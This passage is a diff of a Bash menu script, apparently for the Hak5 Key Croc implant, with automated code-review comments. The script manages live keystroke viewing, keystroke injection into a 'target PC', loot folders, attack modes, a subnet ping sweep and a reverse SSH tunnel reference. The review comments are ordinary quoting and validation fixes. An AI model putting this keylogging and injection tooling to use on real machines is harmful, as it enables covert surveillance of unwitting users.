Monitor for Linux + echo -ne "$(Info_Screen ' +-nmon is short for Nigels performance Monitor for Linux -More details at http://nmon.sourceforge.net/pmwiki.php')\n\n" install_package nmon NMON_MONITORING nmon_system croc_status -nmon + read_all START NMON MONITOR Y/N AND PRESS [ENTER] +case $r_a in +[yY] | [yY][eE][sS]) + nmon ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; nmon_system ;; +esac } ## #----Status list all match words in payloads ## list_match() { clear - echo -ne "$(Info_Screen '-List all MATCH words in payloads folder + echo -ne "$(Info_Screen ' +-List all MATCH words in payloads folder -Option to change MATCH words')\n\n" if [ "$(OS_CHECK)" = WINDOWS ]; then grep MATCH* /root/udisk/payloads/*.txt elif [ "$(OS_CHECK)" = LINUX ]; then grep MATCH* --color=auto /root/udisk/payloads/*.txt fi - read_all CHANGE MATCH WORD FOR PAYLOAD Y/N AND PRESS [ENTER] - case $r_a in + read_all CHANGE MATCH WORD FOR PAYLOAD Y/N AND PRESS [ENTER] ; p_l=${r_a} + case $p_l in [yY] | [yY][eE][sS]) 
- read_all ENTER THE PAYLOAD NAME TO CHANGE MATCH WORD AND PRESS [ENTER] - if [ -e "/root/udisk/payloads/${r_a}" ]; then - R_M=$(cat /root/udisk/payloads/${r_a} | grep MATCH | awk {'print $2'}) + read_all ENTER THE PAYLOAD NAME TO CHANGE MATCH WORD AND PRESS [ENTER] ; name_change=${r_a} + if [ -e "/root/udisk/payloads/${name_change}.txt" ]; then + R_M=$(cat /root/udisk/payloads/${name_change}.txt | grep MATCH | awk {'print $2'}) echo -ne "$(ColorYellow 'Current Match word is ')${green}${R_M}${clear}\n" - echo -ne "${blue}ENTER NEW MATCH WORD AND PRESS [ENTER]:${clear}"; read m_w - sed -i "/MATCH$/!{s/$R_M/$m_w/}" /root/udisk/payloads/${r_a} - grep MATCH* --color=always /root/udisk/payloads/${r_a} + read_all ENTER NEW MATCH WORD AND PRESS [ENTER] ; m_w=${r_a} + sed -i "/MATCH$/!{s/$R_M/$m_w/}" /root/udisk/payloads/${name_change}.txt + grep MATCH* --color=always /root/udisk/payloads/${name_change}.txt else invalid_entry ; list_match fi ;; 
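Review bot: In `list_match`, the payload name and the new MATCH word typed at the prompt go straight into an unquoted path and into the sed program `"/MATCH$/!{s/$R_M/$m_w/}"`, so a name containing `../` reaches files outside /root/udisk/payloads and a word containing `/` or `&` breaks or alters the substitution. Check the name first, e.g. `[[ "${name_change}" =~ ^[[:alnum:]_-]+$ ]] || { invalid_entry ; return ; }`, quote `"/root/udisk/payloads/${name_change}.txt"` wherever it is used, and escape the replacement with `m_w=$(printf '%s' "${m_w}" | sed 's/[&/\]/\\&/g')` before the `sed -i`. `R_M` is used as a regular expression here, so a current MATCH word with metacharacters would need the same care. `list_match` starts inside this hunk and ends outside it.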
@@ -4006,38 +5756,31 @@ fi esac } ## +#----Croc Status check local weather +## +check_weather() { + Q ALT-SPACE + Q STRING "x" + curl wttr.in + sleep 5 + curl wttr.in/moon + sleep 5 +# Q ALT-SPACE +# sleep 1 +# Q STRING "r" +# sleep 1 + menu_A +} +## #----Croc Status Menu ## menu_A() { LED B -MenuTitle KEYCROC STATUS MENU -MenuColor 1 MEMORY USAGE ; echo -ne " ${clear}\n" -MenuColor 2 CPU LOAD ; echo -ne " ${clear}\n" -MenuColor 3 NETWORK-CONNECTIONS ; echo -ne " ${clear}\n" -MenuColor 4 KERNEL VERSION ; echo -ne " ${clear}\n" -MenuColor 5 RUNNING PROCESSES ; echo -ne " ${clear}\n" -MenuColor 6 CHECK ALL ; echo -ne " ${clear}\n" -MenuColor 7 TARGET PC INFO ; echo -ne " ${clear}\n" -MenuColor 8 VIEW LIVE KEYSTORKES ; echo -ne " ${clear}\n" -MenuColor 9 START NMON MONITORING ; echo -ne " ${clear}\n" -MenuColor 10 LIST MATCH PAYLOADS WORDS ; echo -ne " ${clear}\n" -MenuColor 11 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle KEYCROC STATUS MENU ; MenuColor 27 1 MEMORY USAGE ; MenuColor 27 2 CPU LOAD ; MenuColor 27 3 NETWORK-CONNECTIONS ; MenuColor 27 4 KERNEL VERSION ; MenuColor 27 5 RUNNING PROCESSES +MenuColor 27 6 CHECK ALL ; MenuColor 27 7 TARGET PC INFO ; MenuColor 27 8 VIEW LIVE KEYSTORKES ; MenuColor 27 9 START NMON MONITORING ; MenuColor 26 10 LIST MATCH PAYLOADS WORDS ; MenuColor 26 11 CHECK LOCAL WEATHER ; MenuColor 26 12 RETURN TO MAIN MENU ; MenuEnd 30 case $m_a in - 1) memory_check ; menu_A ;; - 2) cpu_check ; menu_A ;; - 3) tcp_check ; menu_A ;; - 4) kernel_check ; menu_A ;; - 5) processes_check ; menu_A ;; - 6) all_checks ; menu_A ;; - 7) pc_info ; menu_A ;; - 8) keystorkes_V ; menu_A ;; - 9) nmon_system ; menu_A ;; - 10) list_match ; menu_A ;; - 11) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; menu_A ;; + 1) memory_check ; menu_A ;; 2) cpu_check ; menu_A ;; 3) tcp_check ; menu_A ;; 4) kernel_check ; menu_A ;; 5) processes_check ; menu_A ;; 6) all_checks ; menu_A ;; + 7) pc_info ; menu_A ;; 8) keystorkes_V ; 
menu_A ;; 9) nmon_system ; menu_A ;; 10) list_match ; menu_A ;; 11) check_weather ;; 12) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; menu_A ;; esac } menu_A @@ -4078,11 +5821,10 @@ fi #----Edit remove file Function ## remove_file() { - cd - ls -aRd $PWD/* --color=auto - ls -R --color=auto - echo "" - read_all ENTER THE PATH TO FILE NAME YOU WISH TO REMOVE AND PRESS [ENTER] + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FILE NAME YOU WISH TO REMOVE AND PRESS [ENTER] if [ -e "${r_a}" ]; then LED R echo -ne ${LINE_}"\e[5m$(ColorRed 'This file will be removed') ${r_a}"${LINE_} @@ -4092,11 +5834,26 @@ else fi } ## +#----Edit any file on keycroc file Function +## +user_edit() { + cd / ; for i in `ls -d */` ; do g=`find ./$i -type f -print | wc -l` ; echo "Directory $i contains $g files."; done + read_all ENTER THE FOLDER NAME TO VEIW FILES ; local r_f=${r_a} + find /${r_f} -type f -name "*.*" + read_all ENTER THE FILE NAME TO EDIT AND PRESS [ENTER] +if [ -e "${r_a}" ]; then + nano ${r_a} +else + invalid_entry ; croc_edit_menu +fi +} +## #----midnight commander, visual file manager ## midnight_manager() { clear - echo -ne "$(Info_Screen '-GNU Midnight Commander is a visual file manager + echo -ne "$(Info_Screen ' +-GNU Midnight Commander is a visual file manager -More details at https://midnight-commander.org')\n" ## #----midnight install function 
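Review bot: `check_weather` calls `curl wttr.in` and `curl wttr.in/moon` with no timeout and no failure handling, unlike the other lookups added in this commit (`curl -Lsf --connect-timeout 2 --max-time 2 ...`), so without a working uplink each request can stall the menu and the two `sleep 5` calls still run. Use the same options here, e.g. `curl -sf --connect-timeout 2 --max-time 5 wttr.in || echo "weather lookup failed"`. The function has no comment explaining why it issues `Q ALT-SPACE` and `Q STRING "x"` before a request that runs on the Key Croc itself, and the commented-out `Q` lines should either be removed or explained.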
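Review bot: `find /${r_f} -type f -name "*.*"` in `remove_file` uses the typed folder name unquoted and unchecked: an empty answer turns it into `find /` over the whole filesystem, a name with a space is split into two arguments, and `-name "*.*"` leaves files without a dot in their name out of a listing the user then deletes from. Prefer `[[ -n "${r_f}" && -d "/${r_f}" ]] || { invalid_entry ; return ; }` followed by `find "/${r_f}" -type f`. The same two lines are added to `user_edit` in the next hunk. The removal itself is outside this hunk, so whether it quotes `${r_a}` cannot be checked here.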
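Review bot: `user_edit` tests the path quoted, `[ -e "${r_a}" ]`, but opens it unquoted with `nano ${r_a}`, so a file name containing a space or a glob character passes the test and is then split into different arguments; write `nano -- "${r_a}"`. The else branch calls `croc_edit_menu` itself while the menu arm that invokes this function is `user_edit ; croc_edit_menu`, so after an invalid entry the menu is entered twice; `invalid_entry` alone would do. A short header comment should state that the entered path is resolved relative to `/`, because the function does `cd /` first.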
@@ -4123,20 +5880,9 @@ mc_remove() { ## #----midnight Menu ## -MenuTitle MIDNIGHT COMMANDER MENU -MenuColor 1 INSTALL MIDNIGHT COMMANDER ; echo -ne " ${clear}\n" -MenuColor 2 REMOVE MIDNIGHT COMMANDER ; echo -ne " ${clear}\n" -MenuColor 3 START MIDNIGHT COMMANDER ; echo -ne " ${clear}\n" -MenuColor 4 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle MIDNIGHT COMMANDER MENU ; MenuColor 26 1 INSTALL MIDNIGHT COMMANDER ; MenuColor 26 2 REMOVE MIDNIGHT COMMANDER ; MenuColor 26 3 START MIDNIGHT COMMANDER ; MenuColor 26 4 RETURN TO MAIN MENU ; MenuEnd 29 case $m_a in - 1) mc_install ; midnight_manager ;; - 2) mc_remove ; midnight_manager ;; - 3) mc ; midnight_manager ;; - 4) main_menu ;; - 0) exit 0 ;; - [bB]) croc_edit_menu ;; - *) invalid_entry ; midnight_manager ;; + 1) mc_install ; midnight_manager ;; 2) mc_remove ; midnight_manager ;; 3) mc ; midnight_manager ;; 4) main_menu ;; 0) exit 0 ;; [bB]) croc_edit_menu ;; *) invalid_entry ; midnight_manager ;; esac } ## @@ -4144,7 +5890,8 @@ MenuEnd ## insert_quack() { clear - echo -ne "$(Info_Screen '-This will open Target pc terminal + echo -ne "$(Info_Screen ' +-This will open Target pc terminal -Insert Quack command -Example enter echo "hello world" -hello world should display in terminal and exit')\n\n" 
@@ -4220,36 +5967,11 @@ esac #----Croc Edit Menu ## LED B -MenuTitle CROC EDIT MENU -MenuColor 1 CROC PAYLOADS FOLDER ; echo -ne " ${clear}\n" -MenuColor 2 CROC TOOLS FOLDER ; echo -ne " ${clear}\n" -MenuColor 3 CROC LOOT FOLDER ; echo -ne " ${clear}\n" -MenuColor 4 CROC CONFIG FILE ; echo -ne " ${clear}\n" -MenuColor 5 CROC ENTER FILE NAME ; echo -ne " ${clear}\n" -MenuColor 6 CROC REMOVE FILES ; echo -ne " ${clear}\n" -MenuColor 7 ATTACKMODE HID STORAGE ; echo -ne " ${clear}\n" -MenuColor 8 ATTACKMODE HID ; echo -ne " ${clear}\n" -MenuColor 9 RELOAD_PAYLOADS ; echo -ne " ${clear}\n" -MenuColor 10 MIDNIGHT MANAGER ; echo -ne " ${clear}\n" -MenuColor 11 QUACK COMMAND ; echo -ne " ${clear}\n" -MenuColor 12 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle CROC EDIT MENU ; MenuColor 22 1 CROC PAYLOADS FOLDER ; MenuColor 22 2 CROC TOOLS FOLDER ; MenuColor 22 3 CROC LOOT FOLDER ; MenuColor 22 4 CROC CONFIG FILE ; MenuColor 22 5 CROC ENTER FILE NAME ; MenuColor 22 6 CROC REMOVE FILES +MenuColor 22 7 ATTACKMODE HID STORAGE ; MenuColor 22 8 ATTACKMODE HID ; MenuColor 22 9 RELOAD_PAYLOADS ; MenuColor 21 10 MIDNIGHT MANAGER ; MenuColor 21 11 QUACK COMMAND ; MenuColor 21 12 RETURN TO MAIN MENU ; MenuEnd 25 case $m_a in - 1) edit_all /root/udisk/payloads ; croc_edit_menu ;; - 2) edit_all /root/udisk/tools ; croc_edit_menu ;; - 3) edit_all /root/udisk/loot ; croc_edit_menu ;; - 4) edit_config ; croc_edit_menu ;; - 5) edit_all ; croc_edit_menu ;; - 6) remove_file ; croc_edit_menu ;; - 7) ATTACKMODE HID STORAGE ; croc_edit_menu ;; - 8) ATTACKMODE HID ; croc_edit_menu ;; - 9) RELOAD_PAYLOADS ; croc_edit_menu ;; - 10) midnight_manager ; croc_edit_menu ;; - 11) insert_quack ; croc_edit_menu ;; - 12) main_menu ;; - 0) exit 0 ;; - [bB]) main_menu ;; - *) invalid_entry ; croc_edit_menu ;; + 1) edit_all /root/udisk/payloads ; croc_edit_menu ;; 2) edit_all /root/udisk/tools ; croc_edit_menu ;; 3) edit_all /root/udisk/loot ; croc_edit_menu ;; 4) edit_config ; 
croc_edit_menu ;; 5) user_edit ; croc_edit_menu ;; 6) remove_file ; croc_edit_menu ;; + 7) ATTACKMODE HID STORAGE ; croc_edit_menu ;; 8) ATTACKMODE HID ; croc_edit_menu ;; 9) RELOAD_PAYLOADS ; croc_edit_menu ;; 10) midnight_manager ; croc_edit_menu ;; 11) insert_quack ; croc_edit_menu ;; 12) main_menu ;; 0) exit 0 ;; [bB]) main_menu ;; *) invalid_entry ; croc_edit_menu ;; esac } ## 
@@ -4263,94 +5985,137 @@ function ssh_menu() { ## install_package sshpass SSHPASS ssh_menu # -# Validate IP v4 or v6 address and start ssh to hak5 device +#----Check and start ssh to hak5 device # ip_check_ssh() { -if [[ "${r_a}" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]]; then - ssh root@${r_a} +ping -q -c 1 -w 1 ${1} &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + ping -q -c 1 -w 1 ${2} &>/dev/null 2>&1 + if [[ $? 
-ne 0 ]]; then + echo -ne "\e[5m$(ColorRed 'Can not start SSH connect on:')${2}${clear}" + elif [[ "${#args[@]}" -eq 0 ]]; then + ssh root@${2} + fi +elif [[ "${#args[@]}" -eq 0 ]]; then + ssh root@${1} else - echo -ne "\e[5m$(ColorRed 'USING DEFAULT IP')${1}" - ssh root@${1} + echo -ne "\e[5m$(ColorRed 'Can not start SSH connect on:')${1}${clear}" fi } ## #----SSH check devices for connection ## check_device() { -if ping -q -c 1 -w 1 ${1} &>/dev/null 2>&1; then - echo -ne "${yellow}${2} ${3} ${clear}${green}ONLINE IP:${1} ${clear}${4} ${5}" -else - echo -ne "${yellow}${2} ${3} ${clear}${red}NOT CONNECTED OR CAN'T BE REACHED ${clear}" +ping -q -c 1 -w 1 ${1} &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + ping -q -c 1 -w 1 ${DEFAULT_IP} &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + sleep 0.1 + elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "\e[38;5;19;4;1;48;5;245m${@:2}${clear}${yellow}:${clear}${green}ONLINE${clear}${yellow} IP:${clear}${green}$(ping -q -c 1 -w 1 ${DEFAULT_IP} | sed -nE 's/^PING[^(]+\(([^)]+)\).*/\1/p')${clear}" ; get_mac ${1} ; port_check ${1} + fi +elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "\e[38;5;19;4;1;48;5;245m${@:2}${clear}${yellow}:${clear}${green}ONLINE${clear}${yellow} IP:${clear}${green}$(ping -q -c 1 -w 1 ${1} | sed -nE 's/^PING[^(]+\(([^)]+)\).*/\1/p')${clear}" ; get_mac ${1} ; port_check ${1} fi 2> /dev/null } ## +#----SSH check default ip +## +default_ip() { + unset DEFAULT_IP + DEFAULT_IP=${1} +} +## #----SSH shark jack get ip from Croc_Pot_Payload ## shark_check() { local SHARK_IP=/root/udisk/tools/Croc_Pot/shark_ip.txt if [ -e ${SHARK_IP} ]; then - if [ "$(sed -n '1p' ${SHARK_IP})" != "" ]; then - IP_F=$(sed -n '1p' ${SHARK_IP}) + if [[ "$(sed -n '1p' ${SHARK_IP})" =~ ${validate_ip} ]]; then + default_ip $(sed -n '1p' ${SHARK_IP}) else - IP_F=172.16.24.1 + default_ip 172.16.24.1 fi fi 2> /dev/null } ## -#----SSH owl get ip from mac +#----SSH LAN TURTLE get ip from Croc_Pot_Payload ## -owl_check() { - local OWL_IP=$(arp -a | 
sed -ne '/00:00:00:00:00:00/p' | sed -e 's/.*(\(.*\)).*/\1/') #place Owl mac here -if [[ "${OWL_IP}" =~ ^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]]; then - IP_O=${OWL_IP} +turtle_check() { + local TURTLE_IP=/root/udisk/tools/Croc_Pot/turtle_mac.txt +if [ -e ${TURTLE_IP} ]; then + if [[ "$(sed -n '1p' ${TURTLE_IP})" =~ ${validate_ip} ]]; then + default_ip $(sed -n '1p' ${TURTLE_IP}) else - IP_O=172.16.56.1 -fi -} -## -#----SSH get public ip -## -public_ip() { - echo -ne "${yellow}Public ip:${clear}${green}$(curl -s --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com) ${clear}" + default_ip 172.16.84.1 + fi +fi 2> /dev/null } ## #----SSH check port 22 open or closed ## port_check() { nc -z -v -w 1 ${1} 22 &>/dev/null 2>&1 -if [[ "$?" 
-ne 0 ]]; then - echo -ne "${yellow} Port:${clear}${red}22 closed${clear}\n" +if [[ $? -ne 0 ]]; then + nc -z -v -w 1 ${DEFAULT_IP} 22 &>/dev/null 2>&1 + if [[ $? -ne 0 ]]; then + echo -ne "${yellow} Port:${clear}${red}22 closed${clear}\n" + unset DEFAULT_IP + elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "${yellow} Port:${clear}${green}22 open${clear}\n" + unset DEFAULT_IP + fi elif [[ "${#args[@]}" -eq 0 ]]; then - echo -ne "${yellow} Port:${clear}${green}22 open${clear}\n" + echo -ne "${yellow} Port:${clear}${green}22 open${clear}\n" fi 2> /dev/null } ## #----SSH get mac addresses ## get_mac () { - echo -ne "${yellow}MAC:${clear}${green}$(arp -n ${1} | awk '/'${1}'/{print $3}' | sed -e 's/HWaddress//g') ${clear}" -} -squirrel_mac() { -if [ -e "/root/udisk/tools/Croc_Pot/squirrel_mac.txt" ]; then - echo -ne "${yellow}MAC:${clear}${green}$(sed -n 1p /root/udisk/tools/Croc_Pot/squirrel_mac.txt) ${clear}" +arp -n ${1} &>/dev/null 2>&1 +if [[ $? -ne 0 ]]; then + if [[ "${save_mac}" =~ ^([[:xdigit:]][[:xdigit:]]:){5}[[:xdigit:]][[:xdigit:]]$ ]]; then + echo -ne "${yellow} MAC:${clear}${green}${save_mac}${clear}" + unset save_mac + else + sleep 0.1 + fi +elif [[ "${#args[@]}" -eq 0 ]]; then + echo -ne "${yellow} MAC:${clear}${green}$(arp ${1} | awk '{print $3}' | sed -e 's/HWaddress//g' | sed '/^[[:space:]]*$/d')" fi 2> /dev/null } -turtle_mac() { -if [ -e "/root/udisk/tools/Croc_Pot/turtle_mac.txt" ]; then - echo -ne "${yellow}MAC:${clear}${green}$(sed -n 1p /root/udisk/tools/Croc_Pot/turtle_mac.txt) ${clear}" +## +#----SSH check for saved mac address +## +saved_mac() { +if [ -e "${1}" ]; then + save_mac=$(sed -n ${2} ${1}) fi 2> /dev/null } +## +#----SSH check for saved mac address for windows +## +saved_mac_win() { +if [ -e "${1}" ]; then + save_mac=$(cat /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt | grep -iPo \^\.*[[:xdigit:]][[:xdigit:]]:[[:xdigit:]]\.\*\$ | sed -n '/[[:xdigit:]]::/!p' | sed -n '/[[:xdigit:]][[:xdigit:]][[:xdigit:]]:/!p' | cut -d " " -f1 | awk 
'FNR <= 1' | sed -e 's/\(.*\)/\L\1/') +fi +} +## +#----SSH check for saved bash bunny mac address +## bunny_mac() { if [ "$(OS_CHECK)" = WINDOWS ]; then sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/bunny_mac.txt - local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_pot/bunny_mac.txt) + local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_Pot/bunny_mac.txt) elif [ "$(OS_CHECK)" = LINUX ]; then - local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_pot/bunny_mac.txt) + local bunny_v=$(sed -n 1p /root/udisk/tools/Croc_Pot/bunny_mac.txt) fi 2> /dev/null -if [[ "$(sed -n 1p /root/udisk/tools/Croc_pot/bunny_mac.txt)" =~ ^([[:xdigit:]][[:xdigit:]]:){5}[[:xdigit:]][[:xdigit:]]$ ]]; then - echo -ne "${yellow}BASH BUNNY:${clear}${green} ONLINE IP: 172.16.64.1${clear}${yellow} MAC:${clear}${green} ${bunny_v}${clear}\n" +if [[ "$(sed -n 1p /root/udisk/tools/Croc_Pot/bunny_mac.txt)" =~ ^([[:xdigit:]][[:xdigit:]]:){5}[[:xdigit:]][[:xdigit:]]$ ]]; then + local bunny_s=$(sed -n 10p /root/udisk/tools/Croc_Pot/Bunny_Payload_Shell/payload.txt | sed -e 's/ssh -fN -R \(.*\):localhost:22/\1/' | sed '1{s/[^ ]\+\s*$//}') + echo -ne "\e[38;5;19;4;1;48;5;245mBASH BUNNY${clear}${yellow}:${clear}${green}TUNNEL${clear} ${yellow}IP:${clear}${green}172.16.64.1${clear}${yellow} MAC:${clear}${green}${bunny_v}${clear}${yellow} Port:${clear}${green}${bunny_s}${clear}\n" else - echo -ne "${yellow}BASH BUNNY:${clear}${red} NOT CONNECTED OR CAN'T BE REACHED${clear}\n" + sleep 0.1 fi 2> /dev/null } ## 
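Review bot: `args` is not defined anywhere in the visible lines, so every `elif [[ "${#args[@]}" -eq 0 ]]` added in `ip_check_ssh`, `check_device`, `port_check` and `get_mac` is presumably always true, which makes it a plain `else` and leaves the final `else` of `ip_check_ssh` unreachable. Testing the command directly instead of `$?` removes the need for it, and quoting the address keeps a malformed value from being split into extra `ping` or `ssh` arguments; a rewrite of `ip_check_ssh` is below and the other three functions can take the same shape. The inline regex check on `${r_a}` that this hunk removes from `ip_check_ssh` has no replacement in the new body, so if callers pass user input it should be matched against `${validate_ip}` first. `saved_mac_win` tests `-e "${1}"` but then reads the hard-coded Croc_OS_Target.txt path, which looks like an oversight.

```shell
ip_check_ssh() {
if ping -q -c 1 -w 1 "${1}" &>/dev/null; then
	ssh "root@${1}"
elif ping -q -c 1 -w 1 "${2}" &>/dev/null; then
	ssh "root@${2}"
else
	echo -ne "\e[5m$(ColorRed 'Can not start SSH connect on:')${2}${clear}"
fi
}
```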
@@ -4360,19 +6125,60 @@ if [ -e "/root/udisk/tools/Croc_Pot/saved_shell.txt" ]; then remote_vps=$(sed -n 1p /root/udisk/tools/Croc_Pot/saved_shell.txt) fi 2> /dev/null ## +#----SSH check current SSID +## +ssid_check() { + local ss_id=$(iw dev wlan0 scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sed -n '/'$(sed -n -e 's/^WIFI_SSID //p' /root/udisk/config.txt)'/p') + local gateway=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " ") + local mask=$(/sbin/ifconfig wlan0 | awk '/Mask:/{ print $4;}' | sed 's/Mask:/'\\${yellow}NetMask:\\${clear}\\${green}'/g') + echo -ne "\e[38;5;19;4;1;48;5;245mSSID ${clear}${yellow}:${clear}${green}${ss_id}${clear}${yellow} GATEWAY IP:${clear}${green}${gateway} ${clear}${mask}${clear}\n" +} +## +#----SSH check if screen crab connected to network +## +screen_crab() { + local t_ip=$(route -n | grep "UG" | grep -v "UGH" | cut -f 10 -d " " | sed -r 's/.{1}$//') + for crab in {1..254} ;do (ping -q -c 1 -w 1 $t_ip$crab >/dev/null &) ;done + local crab_host=$(arp -a | sed -n 's/\(android-[0-9]*\+.\+lan\)/\1/p' | awk '{print $1}') + local crab_ip=$(arp -a | sed -n 's/\(android-[0-9]*\+.\+lan\)/\1/p' | awk '{print $2}' | sed 's/[(),]//g') + if [[ "${crab_ip}" =~ ${validate_ip} ]]; then + check_device ${crab_ip} SCREEN CRAB + fi +} +## +#----SSH check signal owl connected to network +## +owl_check() { +#----place Owl mac here + local OWL_MAC=00:00:00:00:00:00 + local OWL_IP=$(arp -a | sed -ne '/'${OWL_MAC}'/p' | sed -e 's/.*(\(.*\)).*/\1/') +if [[ "${OWL_IP}" =~ ${validate_ip} ]]; then + IP_O=${OWL_IP} +else + IP_O=172.16.56.1 +fi +} +## #----SSH display info screen ## - echo -ne "$(Info_Screen '-SSH into HAK5 gear & TARGET PC + echo -ne "$(Info_Screen ' +-SSH into HAK5 gear & TARGET PC -Reverse ssh tunnel, Create SSH Public/Private Key -Ensure devices are connected to the same local network As keycroc')\n" -check_device $(os_ip) TARGET PC: $(public_ip) ; 
port_check $(os_ip) -check_device 172.16.42.1 WIFI PINEAPPLE: $(get_mac "172.16.42.1") ; port_check 172.16.42.1 -check_device 172.16.32.1 PACKET SQUIRREL: $(squirrel_mac) ; port_check 172.16.32.1 -check_device 172.16.84.1 LAN TURTLE: $(turtle_mac) ; port_check 172.16.84.1 -shark_check ; check_device ${IP_F} SHARK JACK: $(get_mac) ${IP_F} ; port_check ${IP_F} -bunny_mac -check_device ${remote_vps} REMOTE VPS: ; port_check ${remote_vps} -#owl_check ; check_device ${IP_O} OWL : $(get_mac "${IP_O}") ; port_check ${IP_O} +local croc_mac=$(cat /sys/class/net/$(ip route show default | awk '/default/ {print $5}')/address) +local croc_city=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=city) +local croc_country=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=country) +local croc_region=$(curl -Lsf --connect-timeout 2 --max-time 2 http://ip-api.com/line?fields=region) +local 